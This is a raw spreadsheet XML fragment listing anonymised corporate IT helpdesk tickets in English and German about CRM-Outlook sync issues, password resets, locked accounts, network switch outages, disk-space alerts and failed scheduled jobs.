[cid:image003.jpg@01SID_355c5.47cb4490]
why is it when i click on [cid:image002.png@01SID_355c6.2b4plant_200]  it opens up a new large crm page and shows i created a calendar date but it doesn't show in my regular crm even after closing it and reopening it?
[cid:image006.png@01SID_355c6.2b4plant_200]
this is what shows in my regular crm
[cid:image007.png@01SID_355c9.2121d1c0]
</t>
  </si>
  <si>
    <t>jhxwiply midhcnze</t>
  </si>
  <si>
    <t>vip 2: time setting on collaboration_platform</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ebikdrqw.empubwxo@gmail.com_x000D_
_x000D_
i am experiencing problems with elt folders in collaboration_platform.  my collaboration_platform view for the elt meetings is not current and is not updating as documents are uploaded._x000D_
_x000D_
i was told it has to do with my time setting on my pc.  lpoebzsc grknswyo i tried to reset it but the system did not reset it._x000D_
_x000D_
please look into it and fix the problem._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>dbfrevtj wbrpdxnj</t>
  </si>
  <si>
    <t>ms crm installation .</t>
  </si>
  <si>
    <t>ms crm installation ._x000D_
connected to the user system using teamviewer._x000D_
-installed the mscrm add in for outlook._x000D_
-launched the outlook._x000D_
-user able to see the crm add-in on outlook._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>zbxljotu cbunzrak ihre rechnung zur bestellung nr. 45507867717 vom 23.09.2016</t>
  </si>
  <si>
    <t>zbxljotu cbunzrak ihre rechnung zur bestellung nr. 45507867717 vom 23.09.2016
error:  account to order no. 45507867717 from 09.23.2016</t>
  </si>
  <si>
    <t>zbxljotu cbunzrak</t>
  </si>
  <si>
    <t>outlook configuration and vpn connectivity</t>
  </si>
  <si>
    <t>engineering tool login issue._x000D_
-connected to the user system using teamviewer._x000D_
-unlocked the user account._x000D_
-caller confirmed that he was able to login._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t xml:space="preserve">urgent help required- outlook to crm mfg_tooltion issue. </t>
  </si>
  <si>
    <t>urgent help required- outlook to crm mfg_tooltion issue.
need crm tab on my outlook</t>
  </si>
  <si>
    <t>dell 7350: skype audio not working.</t>
  </si>
  <si>
    <t>dell 7350: skype audio not working._x000D_
-connected to the user system using teamviewer._x000D_
-updated the sound drivers, restarted the pc._x000D_
-user able to listen to the audio over the skype calls._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>tmhflanr snbvcido</t>
  </si>
  <si>
    <t>support with</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: jogtse.mhytusa@company.com
hello
could you please help us to add the customers below to engineering tool software
81945970
maquinados de precision de mex
81039422
magonza sa de cv
81039927
evercast s.a. de c.v.
81030720
tecnologia en maquinados hidra
saludos
johjkse luartusa rahymos
representante de ventas zona bajio
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
[#+company/posts&gt;[
select the following link to view the disclaimer in an alternate language. 
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
[#+company/posts&gt;  [
select the following link to view the disclaimer in an alternate language. </t>
  </si>
  <si>
    <t>kwyozxgd gasxctph</t>
  </si>
  <si>
    <t>_x000D_
-connected to the user system using teamviewer._x000D_
-help the user login to the portal._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>ie issue</t>
  </si>
  <si>
    <t>ptljghyk qhtvlrxe</t>
  </si>
  <si>
    <t>multiple switch company-na-usa-usa is down since 2:15 pm et on 09/23/16</t>
  </si>
  <si>
    <t>switch company-na-usa-usa-shippingarea-2960-access-sw01 (23.36.37.1866 )  and  company-na-usa-usa-furnace-2960-access-sw01 (80.25.07.069) located at usa is down  since 2:15 pm et</t>
  </si>
  <si>
    <t xml:space="preserve">i drive not connecting </t>
  </si>
  <si>
    <t>i drive not connecting _x000D_
_x000D_
tried with ip address, no go._x000D_
checked server name: no go_x000D_
user mentioned that he changed his password for vpn and then not able to connect to i drive._x000D_
rest all drivers are working fine and accessible._x000D_
informed user to get in touch with one of colleagues and get the screen shot of all drivers he has access to also to onfiirm i drive._x000D_
tried mapping i drive with password , nogo._x000D_
_x000D_
waiting for user email .</t>
  </si>
  <si>
    <t>tnhzdapi juqcbdzl</t>
  </si>
  <si>
    <t xml:space="preserve">support with </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: whoyizfp.gclnfkis@gmail.com
hello
could you please help us to add the customers below to engineering tool software
81945970
maquinados de precision de mex
81039422
magonza sa de cv
81039927
evercast s.a. de c.v.
81030720
tecnologia en maquinados hidra
saludos
whoyizfp gclnfkis.
sr sales engineer
whoyizfp.gclnfkis@gmail.com&lt;mailto:mailo:whoyizfp.gclnfkis@gmail.com&gt;
</t>
  </si>
  <si>
    <t>whoyizfp gclnfkis</t>
  </si>
  <si>
    <t>locked er</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: jxgobwrm.qkugdipo@gmail.com_x000D_
_x000D_
i'm trying to add a change item to my er 2240766, but i get the error listed below_x000D_
_x000D_
_x000D_
[cid:image001.png@01SID_3559d.48177471]_x000D_
_x000D_
knethyen grechduy_x000D_
engineer, product engineering_x000D_
company_x000D_
jxgobwrm.qkugdipo@gmail.com&lt;mailto:jxgobwrm.qkugdipo@gmail.com&gt;_x000D_
t: (615 641-4399_x000D_
f: (615) 641-4268_x000D_
_x000D_
[cid:image001.jpg@01ced94a.22bd1f30]_x000D_
_x000D_
company inc. | 1600 technology way | usa, pa. 15650 | www.company.com&lt;_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>problem on trs</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: bvpglyzh.dyhusejm@gmail.com_x000D_
_x000D_
hello, i have this error while sending trs, connected to vpn, can you help me? </t>
  </si>
  <si>
    <t>bvpglyzh dyhusejm</t>
  </si>
  <si>
    <t xml:space="preserve"> urgent help required - outlook to crm mfg_tooltion issue. 
problem detail---after "set regarding" a calendar item to an account, it doesn't show in the assigned crm account record. 
ph:
</t>
  </si>
  <si>
    <t>goktenap kjnwotzq</t>
  </si>
  <si>
    <t>ticket update for ticket_no0442691</t>
  </si>
  <si>
    <t>skype error : getting skype certificate error</t>
  </si>
  <si>
    <t>xwzstlgj tzkbmgan</t>
  </si>
  <si>
    <t>logon balancing error in erp even after connecting to vpn</t>
  </si>
  <si>
    <t xml:space="preserve">unable to connect to erp modules even after connecting to vpn, logon balancing error =88._x000D_
it was working 15 minutes back. </t>
  </si>
  <si>
    <t xml:space="preserve">infopath issue : </t>
  </si>
  <si>
    <t>can not submit a discount through collaboration_platform._x000D_
_x000D_
says access denied must add to favorites i had this happen before.</t>
  </si>
  <si>
    <t>kinryjcf pgetfijq</t>
  </si>
  <si>
    <t>unable to connect to mobile broadband</t>
  </si>
  <si>
    <t xml:space="preserve">interface: fastethernet0/6 Â· company-johthryugftyson-city-ap-2 on company-na-usa-johthryugftyson-city-2960-access-sw02.company.com is down </t>
  </si>
  <si>
    <t xml:space="preserve">interface: fastethernet0/6 Â· company-johthryugftyson-city-ap-2 on company-na-usa-johthryugftyson-city-2960-access-sw02.company.com is down since 10:34 am on 09/23 et._x000D_
_x000D_
logged on to switch found interface is down:_x000D_
_x000D_
sep 23 10:32:09.262 edt: %lineproto-5-updown: line protocol on interface fastethernet0/6, changed state to down_x000D_
sep 23 10:32:10.261 edt: %link-3-updown: interface fastethernet0/6, changed state to down_x000D_
company-na-usa-johthryugftyson-city-2960-access-sw02&gt;$_x000D_
</t>
  </si>
  <si>
    <t>nlrwqeti qarixwbv</t>
  </si>
  <si>
    <t>tqrylspg ijzghqwy</t>
  </si>
  <si>
    <t>audio issue in dell 7350</t>
  </si>
  <si>
    <t>name:ksgytjqr ojdukgzc
language:
browser:microsoft internet explorer
email:ksgytjqr.ojdukgzc@gmail.com
customer number:
telephone:
summary:i cannot get the volume up high enough. it was fine yesterday now not high enough for conference calls.</t>
  </si>
  <si>
    <t>oalprbtd nyxftpms</t>
  </si>
  <si>
    <t>performance (speed) issue (mii)</t>
  </si>
  <si>
    <t xml:space="preserve">order took 30 minutes to batch over from one work center bucket to the next._x000D_
 _x000D_
order 226020715_x000D_
operation 30 - 7:45_x000D_
operation 40/50 - 8:16_x000D_
_x000D_
this has happened on multiple other orders as well._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>outlook error</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: doxmlcpr.xjheyscu@gmail.com_x000D_
_x000D_
hi,_x000D_
      i am not able to get into outlook any more. keep getting messages telling me its stopped working and do i want to restart in safe mode to do repair. have had to send this from my phone. </t>
  </si>
  <si>
    <t>doxmlcpr xjheyscu</t>
  </si>
  <si>
    <t>need the password_management_tool link</t>
  </si>
  <si>
    <t>unable to connect to tc78</t>
  </si>
  <si>
    <t>usa village - clappdico:  company-na-usa-clappdico-wireless-2960-access-sw06 is down since at 9:46 am et on 09/23.</t>
  </si>
  <si>
    <t xml:space="preserve">usa village - clappdico:  company-na-usa-clappdico-wireless-2960-access-sw06 is down since at 9:46 am et on 09/23._x000D_
gigabitethernet0/1 Â· ###connection to clappdico wireless switch 53.96.41.1370-company-na-usa-clappdico-2960-access-sw05 </t>
  </si>
  <si>
    <t>internet explorer issue</t>
  </si>
  <si>
    <t>fcpnodsr nbrdxscg</t>
  </si>
  <si>
    <t>reset the password for oweklxnm ubayizsq on windows login</t>
  </si>
  <si>
    <t>i try to change my log-in  password and the system keeps stating the old password is not correct.  and i disagree, because i tried so many times ( being careful), i know i  typed in my old password correctly.</t>
  </si>
  <si>
    <t>oweklxnm ubayizsq</t>
  </si>
  <si>
    <t>zyxjagro vjgozhpn</t>
  </si>
  <si>
    <t>please unlock : tpfghtlugn (erp hana SID_60) do not reset password.</t>
  </si>
  <si>
    <t xml:space="preserve"> k100sfs.company.company.com is reporting a : down status on, HostName_343. please investigate</t>
  </si>
  <si>
    <t>observing below alert in monitoring_tool since 8:49 am on 09/23 et._x000D_
 k100sfs.company.company.com is reporting a : down status on, HostName_343. please investigate_x000D_
cpu load is showing 100%</t>
  </si>
  <si>
    <t>crm in mobile phone</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: qjiutmel.fgvtxeoy@gmail.com
good morning,
crm on my mobile device will not work, please see below a screen shot.
wghjkftewj
[cid:1d5bf51c-ed12-434b-940e-88747180d3e1]
</t>
  </si>
  <si>
    <t>qjiutmel fgvtxeoy</t>
  </si>
  <si>
    <t>unable to get emails synced on samsung mobile device</t>
  </si>
  <si>
    <t xml:space="preserve">password reset ad </t>
  </si>
  <si>
    <t>ojgxundh aegxpmvd</t>
  </si>
  <si>
    <t>users are unable to connect to a machine in shop floor.</t>
  </si>
  <si>
    <t>users are unable to connect to a machine in shop floor
machine name - 391-mazak
contact n0 - .</t>
  </si>
  <si>
    <t>pm_tool_for_sd: missing currency-table in pm_tool_for_sd-prod</t>
  </si>
  <si>
    <t xml:space="preserve">from: jurten setgyrt 
sent: friday, september 23, 2016 7:33 am
to: stefyty parkeyhrt &lt;esntuago.kwxrdhuv@gmail.com&gt;
cc: qikvnjzc evmrcqug &lt;qikvnjzc.evmrcqug@gmail.com&gt;
subject: aw: pm_tool_for_sd: missing currency-table in pm_tool_for_sd-prod.!!!
hello stefyty
any progress on that topic?
we are running in trouble because we have to send out two proposals but cannot because of missing pricing
best </t>
  </si>
  <si>
    <t>crebvyhm nsegpdab</t>
  </si>
  <si>
    <t>office reinstall</t>
  </si>
  <si>
    <t>ejvkzobl yijgokrn</t>
  </si>
  <si>
    <t>re: need a little help--please</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: bcefayom.lzhwcgvb@gmail.com
lunjuws,
if you recall we had this new form developed when we were there for the tmb project specially as per bakyhrer huhuyghes  requirement.
please don't print this email unless you really need to - this will preserve trees on planet earth.
from: smxoklny hbecskgl
sent: 23 september 2016 17:45
to: damuphws arkulcoi;  an; company@ticketing_tool.com
cc: les
subject: re: need a little help--please
hcytr,
            is this format the one that bakyhrer huhuyghes required with their bin numbers on the delivery note?
shathyra,
            are you aware of the special requirement for bakyhrer huhuyghes  delivery notes?  i forgot about it until hcytr mentioned this.
best </t>
  </si>
  <si>
    <t>bcefayom lzhwcgvb</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: smxoklny.hbecskgl@gmail.com
chanthrydru,
            is this format the one that bakyhrer huhuyghes required with their bin numbers on the delivery note?
shathyra,
            are you aware of the special requirement for bakyhrer huhuyghes delivery notes?  i forgot about it until chanthrydru mentioned this.
best </t>
  </si>
  <si>
    <t>please include purchase group in pr to po analysis.</t>
  </si>
  <si>
    <t xml:space="preserve">please include field to enter aqzz/erpquery/memepr_3========_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>xerox in our office will not turn on, no power.  outlet where it's plugged in is good.</t>
  </si>
  <si>
    <t>rechner ewewx212455 ( olympus ) kein zugriff auf     \\HostName_736\EU_tool\   mÃ¶glich</t>
  </si>
  <si>
    <t>printer not working</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: ugyawsjv.ypgjirlm@gmail.com
dear sir,
the printer at msg second floor \\awyrthysm010\\w46&lt;file:///\\awyrthysm010\w46&gt; is not working.
please rectify the problem immediately.
</t>
  </si>
  <si>
    <t>ugyawsjv ypgjirlm</t>
  </si>
  <si>
    <t>ms outlook doens't start</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: tzradpnj.izlotycb@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
_x000D_
as many times before, after system password change, ms outlook doens't start._x000D_
attached printscreen._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>tzradpnj izlotycb</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_488 failed in job_scheduler at: 09/23/2016 06:33:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_488 failed in job_scheduler at: 09/23/2016 06:33:00</t>
  </si>
  <si>
    <t xml:space="preserve">co account assignments have different profit centers </t>
  </si>
  <si>
    <t xml:space="preserve">from: rzucjgvp ioqjgmah 
sent: friday, september 23, 2016 12:09 pm
to: subgtybaryuao hs; nyifqpmv kfirxjag
subject: re: erro log-reg
hi sutyu,
this seems to be related to co issue.  i am requesting co person to look into this issue.
hi ramdntyassthywamy,
please help mr.subgtybaryuao on this.
</t>
  </si>
  <si>
    <t>eyxngjol lohcygnf</t>
  </si>
  <si>
    <t>system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): SID_34
enter user id of user having the issue:
magerjtyhd
yadavtghya
schgtewmik
transaction code(s) the user needs or was working with:
zcopc
describe the issue:
please remove the plant controller role from all three users. i have discussed with uylvgtfi eovkxgpn. he and obdphylz qaeicrkz do not need access again to zcopc. qbjmoihg nbgvyqac needs it but i would prefer if you could assign the role co:team_view for her instead of plant controller. 
if you are getting a "not authorized" message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket.
provide access the same as this other user:</t>
  </si>
  <si>
    <t>ipwjorsc uboapexr</t>
  </si>
  <si>
    <t>install EU_tool und bls \ rechner  olympus \xwirzvda okhyipgr</t>
  </si>
  <si>
    <t>schreib- und leseberechtigung auf den ordner  m:\staebefertigung-leitung einrichten</t>
  </si>
  <si>
    <t xml:space="preserve">hallo ,_x000D_
_x000D_
bitte schreib- und leseberechtigung fÃ¼r user maerza auf den ordner  m:\staebefertigung-leitung einrichten._x000D_
_x000D_
danke_x000D_
</t>
  </si>
  <si>
    <t>htvepyua izgulrcf</t>
  </si>
  <si>
    <t>dds</t>
  </si>
  <si>
    <t>dss</t>
  </si>
  <si>
    <t>onctqhsg cpahzsle</t>
  </si>
  <si>
    <t>info type '0017' missing to personal number 56678054</t>
  </si>
  <si>
    <t xml:space="preserve">from: fbgetczn jlsvxura _x000D_
sent: friday, september 23, 2016 10:15 am_x000D_
to: nyifqpmv kfirxjag_x000D_
cc: wjkzgyxh pktcqbxu_x000D_
subject: aw: unterhaltung mit nyifqpmv kfirxjag_x000D_
_x000D_
hello hr. ramdntyassthywamy,_x000D_
sebfghkasthian asked me to send you the below attached screen shots._x000D_
_x000D_
 _x000D_
_x000D_
 _x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>fbgetczn jlsvxura</t>
  </si>
  <si>
    <t>request access to SID_1 uacyltoe hxgaycze</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: gkerqucv.bqumyrea@gmail.com
good day,
jfhytu mthyuleng
senior buyer
gkerqucv.bqumyrea@gmail.com
[company 75th anniversary logo]
</t>
  </si>
  <si>
    <t>gkerqucv bqumyrea</t>
  </si>
  <si>
    <t>setup new ws \ewew8323879 \jionmpsf wnkpzcmv</t>
  </si>
  <si>
    <t>drucker von cvd we17  einrichten am pc 212536 in der qs</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rgtarthi.erjgypa@company.com_x000D_
_x000D_
hello help,_x000D_
_x000D_
outlook is not getting updated automatically &amp; periodically,_x000D_
time to time i need to update send &amp; receive folder. this issue persists since last wednesday ( 14th sep)._x000D_
_x000D_
system was given to the it dept here on 21st  but there is no improvement._x000D_
_x000D_
_x000D_
[cid:image001.png@01SID_355a1.ee766460]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>probleme mit collaboration_platform / infopath \difozlav dgbfptos</t>
  </si>
  <si>
    <t xml:space="preserve">erp pur - wrong subcontracting demand 2nd material </t>
  </si>
  <si>
    <t xml:space="preserve">hello,_x000D_
with component 2433384 we see a wrong subcontracting demand in erp coming from parent  3181756. _x000D_
the strange thing is that the po referenced is not a subcontracting po. _x000D_
we need to understand whatÂ´s going wrong here and need to remove the incorrect demand. _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>tckyrinp vbzqslco</t>
  </si>
  <si>
    <t xml:space="preserve">HostName_1379: volume: h:\is over 85% space consumed. space available: 2.0 g </t>
  </si>
  <si>
    <t xml:space="preserve">volume: h:\ label:dat4-HostName_1379-data e3fce49 on server: is over _x000D_
85% space consumed. space available: 2.0 g </t>
  </si>
  <si>
    <t>owa does not open.</t>
  </si>
  <si>
    <t>owa does not open. _x000D_
error : page can not be displayed</t>
  </si>
  <si>
    <t>wczrtsja crwioekx</t>
  </si>
  <si>
    <t>HostName_1379 : volume: c:\ is over 85% space consumed. space available: 3.5 g :</t>
  </si>
  <si>
    <t>volume: c:\ label:sys-HostName_1379 28385a7b on server: is over _x000D_
85% space consumed. space available: 3.5 g :</t>
  </si>
  <si>
    <t>user tempuser changed the layout in fb03 to be the default setting for everyone</t>
  </si>
  <si>
    <t xml:space="preserve">erp SID_34, finance:_x000D_
user tempuser changed the layout in fb03 (/jinf(a)) to be the default setting for everyone. we tried to figure out which layout was the default before., i have chosen /2erp for now, but don't know exactly if this really was the default. ._x000D_
this happens from time to time, some users are not aware that they set a default for everyone.  </t>
  </si>
  <si>
    <t xml:space="preserve">keine netzwerkverbindung fÃ¼r rechner vhw7020 </t>
  </si>
  <si>
    <t>bitte netzwerkverbindung fÃ¼r rechner vhw7020 herstellen (alicona messraum cs halle a)</t>
  </si>
  <si>
    <t>wogicpdt jbdyzmhf</t>
  </si>
  <si>
    <t>appreciate hub password</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: xwertljy.zrmlhkyq@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
please reset my appreciate hub password._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>xwertljy zrmlhkyq</t>
  </si>
  <si>
    <t>account "helftgyldt" gesperrt</t>
  </si>
  <si>
    <t>anmeldung bei account "helftgyldt" nicht mÃ¶glich. fehlermeldung : "das angesprochene konto ist momentan gesperrt und kann nicht fÃ¼r die anmeldung verwendet werden."</t>
  </si>
  <si>
    <t>kbcedtiq jxnzpgwe</t>
  </si>
  <si>
    <t>reset passwords for qoybxkfh dwcmxuea using password_management_tool password reset.</t>
  </si>
  <si>
    <t>qoybxkfh dwcmxuea</t>
  </si>
  <si>
    <t>outlook takes too much time to open.</t>
  </si>
  <si>
    <t>rxgvfoub fhqmvwrd</t>
  </si>
  <si>
    <t>unable to change password through password_management_tool</t>
  </si>
  <si>
    <t>ypuaejsc yoxrqtsn</t>
  </si>
  <si>
    <t>account "jncvkrzm thjquiyl" gesperrt</t>
  </si>
  <si>
    <t>anmeldung bei account "jncvkrzm thjquiyl" nicht mÃ¶glich. fehlermeldung : "das angesprochene konto ist momentan gesperrt und kann nicht fÃ¼r die anmeldung verwendet werden."</t>
  </si>
  <si>
    <t>access for printer wy15 for trainee</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: jczwxvdn.pexuklry@gmail.com
hi,
please provide access to wy15 printer (machine tool business) for below trainee.
trainee name: blapmcwk dgrkbnua k
login id: vvkusgtms4
computer no.: awyw8911656
</t>
  </si>
  <si>
    <t>jczwxvdn pexuklry</t>
  </si>
  <si>
    <t xml:space="preserve">error when pgi for with t&amp;d delivery 9169324512 </t>
  </si>
  <si>
    <t xml:space="preserve">gso,_x000D_
please open an it ticket for the erp co group to review the issue below with t&amp;d delivery 9169324512 where pgi does not work because of co assignment having different profit centers._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>aeiljfxg hzwxtyjr</t>
  </si>
  <si>
    <t>account lock release request of "nakagtwsgs"</t>
  </si>
  <si>
    <t xml:space="preserve">hi team,
please unlock the windows account "nakagtwsgs".
user nameï¼šqwghlvdx pjwvdiuz 
best </t>
  </si>
  <si>
    <t>gworzkhc inypbucg</t>
  </si>
  <si>
    <t>password reset -hsh</t>
  </si>
  <si>
    <t xml:space="preserve">hello:
one of the workman aqihfoly xsrkthvf whose user id is hsh is not able to login to ess as his user id locked.  he is a kiosk user.  please  re-set his password and confirm.
noscwdpm akiowsmp
manager, hr shared services center
noscwdpm.akiowsmp@gmail.com 
</t>
  </si>
  <si>
    <t>picture in collaboration_platform / outlook / skype (user: faerfrtbj)</t>
  </si>
  <si>
    <t>my profile shows different pictures on collaboration_platform / outlook / skype. see attached screenshots. the correct one should be the one shown on attachment "actual.jpg"</t>
  </si>
  <si>
    <t>gwrkhufx gsfrlqwi</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_485 failed in job_scheduler at: 09/23/2016 02:31:00  </t>
  </si>
  <si>
    <t xml:space="preserve">received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_485 failed in job_scheduler at: 09/23/2016 02:31:00_x000D_
_x000D_
9/23/2016 1:05:55 am :: unable to release guest. error: failed to unfreeze guest system (network mode)_x000D_
rpc function call failed. function name: [unfreeze]. target machine: [10.2.18.54]._x000D_
rpc error:the remote procedure call failed._x000D_
 code: 1726 _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: bctypmjw.cbhnxafz@gmail.com
dear collegues,
i need a password reset for erp hrp modul.
username: rethtyuzkd
gruÃŸ/</t>
  </si>
  <si>
    <t>bctypmjw cbhnxafz</t>
  </si>
  <si>
    <t>can i be allowed to use dropbox ?</t>
  </si>
  <si>
    <t xml:space="preserve">marcom team has assigned a task of proofreading.  it requires me to download into dropdox.  </t>
  </si>
  <si>
    <t>obfgkwim hlasbrmj</t>
  </si>
  <si>
    <t>erp account gesperrt</t>
  </si>
  <si>
    <t>erp-passwort 3mal verkehrt eingegeben - bitte erp-account freischalten.</t>
  </si>
  <si>
    <t>add the rtpcnyhq ceqmwkhi to  materials_management / purchasing</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: inxsupmy.zhwmifvx@gmail.com
hello team,
can you please add rtpcnyhq ceqmwkhi to the materials_management/purchasing group in ticketing_tool .
inxsupmy zhwmifvx
team lead - ssl (sourcing &amp; logistics) - global it
inxsupmy.zhwmifvx@gmail.com
</t>
  </si>
  <si>
    <t xml:space="preserve">job bwhrertran failed in job_scheduler at: 09/23/2016 00:17:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bwhrertran failed in job_scheduler at: 09/23/2016 00:17:00</t>
  </si>
  <si>
    <t>india coating: interface: vlan1  on company-ap-ind-india-coating-dmvpn-891-rtr01 is down since 9/22/2016 11:12 pm et.</t>
  </si>
  <si>
    <t>engineering tool log in problem</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: dwsyaqpr.bzasnmvw@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
i have changed the password of engineering tool 2days back. it showed that it is successfully changed._x000D_
still i am not able to login._x000D_
_x000D_
please check the error message in the below image._x000D_
_x000D_
[cid:image001.jpg@01SID_35577.c8358d50]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>engineering_tool problem</t>
  </si>
  <si>
    <t xml:space="preserve">hello_x000D_
i can not add a new customer while making a new engineering_tool._x000D_
i entered the country and the city._x000D_
there used to be a button new, but not anymore._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>cuytdmhv yeqdmwvt</t>
  </si>
  <si>
    <t>apac, apac: temprature sensor#1, yellow - on   company-ap-chn-apac-3750-access-sw02 on 9/22/2016 at 9:50 pm et.</t>
  </si>
  <si>
    <t>sw#1, temperature sensor#1, yellow - on   company-ap-chn-apac-3750-access-sw02_x000D_
 hardware component: warning or critical state detected</t>
  </si>
  <si>
    <t>vip 2 - outlook not working - receiving a message that it is not a licensed product</t>
  </si>
  <si>
    <t>outlook not working - receiving a message that it is not a licensed product</t>
  </si>
  <si>
    <t>qdilorms feayhdmu</t>
  </si>
  <si>
    <t>urgent - new customer account</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: aunpdmlj.kzhapcve@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
unable to proceed with opening a new customer account #81053922._x000D_
_x000D_
please advise as what the issue is?_x000D_
_x000D_
[cid:image003.jpg@01SID_35583.6ed99ce0]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>aunpdmlj kzhapcve</t>
  </si>
  <si>
    <t>sign in password</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: fpedscxo.acuvyqnx@gmail.com_x000D_
_x000D_
team,_x000D_
_x000D_
i was recently advised that my password needed changing._x000D_
i went to the password manager site and changed passwords._x000D_
_x000D_
all passwords for different things changed except one, my startup to log onto computer failed to change how do i change this one._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>fpedscxo acuvyqnx</t>
  </si>
  <si>
    <t>boot up issue with the laptop.</t>
  </si>
  <si>
    <t xml:space="preserve">boot up issue with the laptop.
-user requesting local it to check  the laptop as the pc is not booting up at all.
-user tried to plug in the power adaptor .still no go.
-service tag: 7658r32
-asset tag: 405268
-ph: 
 </t>
  </si>
  <si>
    <t>:my computer keeps going off line</t>
  </si>
  <si>
    <t>name:sndaofyw jetcxpda
language:
browser:microsoft internet explorer
email:vichtyuky.warhtyonack@company.com
customer number:
telephone:
summary:my computer keeps going off line</t>
  </si>
  <si>
    <t>sndaofyw jetcxpda</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_555 failed in job_scheduler at: 09/22/2016 18:17:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_555 failed in job_scheduler at: 09/22/2016 18:17:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_46filesys failed in job_scheduler at: 09/22/2016 18:16:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_46filesys failed in job_scheduler at: 09/22/2016 18:16:00</t>
  </si>
  <si>
    <t>user not recieving email on the iphone.</t>
  </si>
  <si>
    <t xml:space="preserve">user not recieving email on the iphone._x000D_
-checked the user account .all fine._x000D_
-checked the user accont on the ecp site.all fine._x000D_
-advised the user to contact vendor._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>bfmlysrk olbthfqr</t>
  </si>
  <si>
    <t>vip 2: skype login issue.</t>
  </si>
  <si>
    <t>name:rgtyob lafgseimer
language:
browser:microsoft internet explorer
email:pjcompanyfeg.wnrcyaks@gmail.com
customer number:
telephone:
summary:reset password today now skype will not take password</t>
  </si>
  <si>
    <t>pjkmtfeg wnrcyaks</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_47filesys failed in job_scheduler at: 09/22/2016 17:01:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_47filesys failed in job_scheduler at: 09/22/2016 17:01:00</t>
  </si>
  <si>
    <t>software installation</t>
  </si>
  <si>
    <t>name:uprmwlgb kirvecja
language:
browser:microsoft internet explorer
email:uprmwlgb.kirvecja@gmail.com
customer number:
telephone:
summary:software installation</t>
  </si>
  <si>
    <t>uprmwlgb kirvecja</t>
  </si>
  <si>
    <t xml:space="preserve">unable to print erp jobs from prtqv7282 after routing it from prtqv0001 </t>
  </si>
  <si>
    <t>change printer from prtqv0001 to prtqv7282</t>
  </si>
  <si>
    <t>request to reset microsoft online services password for vmdwslkj.exvcknbp@gmail.com</t>
  </si>
  <si>
    <t xml:space="preserve">from: microsoft on behalf of company inc. [mailto:msonlineservicesteam@microsoftonline.com] 
sent: thursday, september 22, 2016 7:57 pm
to: nwfodmhc exurcwkm
cc: tiyhum kuyiomar
subject: amar - request to reset microsoft online services password for vmdwslkj.exvcknbp@gmail.com
importance: high
    request to reset user's password   
   the following user in your organization has requested a password reset be performed for their account: 
â€¢ vmdwslkj.exvcknbp@gmail.com 
â€¢ first name: angyta hgywselena 
â€¢ last name: brescsfgryiani acgyuna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</si>
  <si>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vmdwslkj exvcknbp</t>
  </si>
  <si>
    <t>bill hartwell can't access drawings on \\HostName_1330\departments\engineering\process sheets cadkey dwgs</t>
  </si>
  <si>
    <t>please assign bill the necessary permissions so that he can open the drawings (see attachment)</t>
  </si>
  <si>
    <t>zqrnveyx hajtfmcd</t>
  </si>
  <si>
    <t>quoting engine</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: iauqlrjk.nijdaukz@gmail.com
hello,
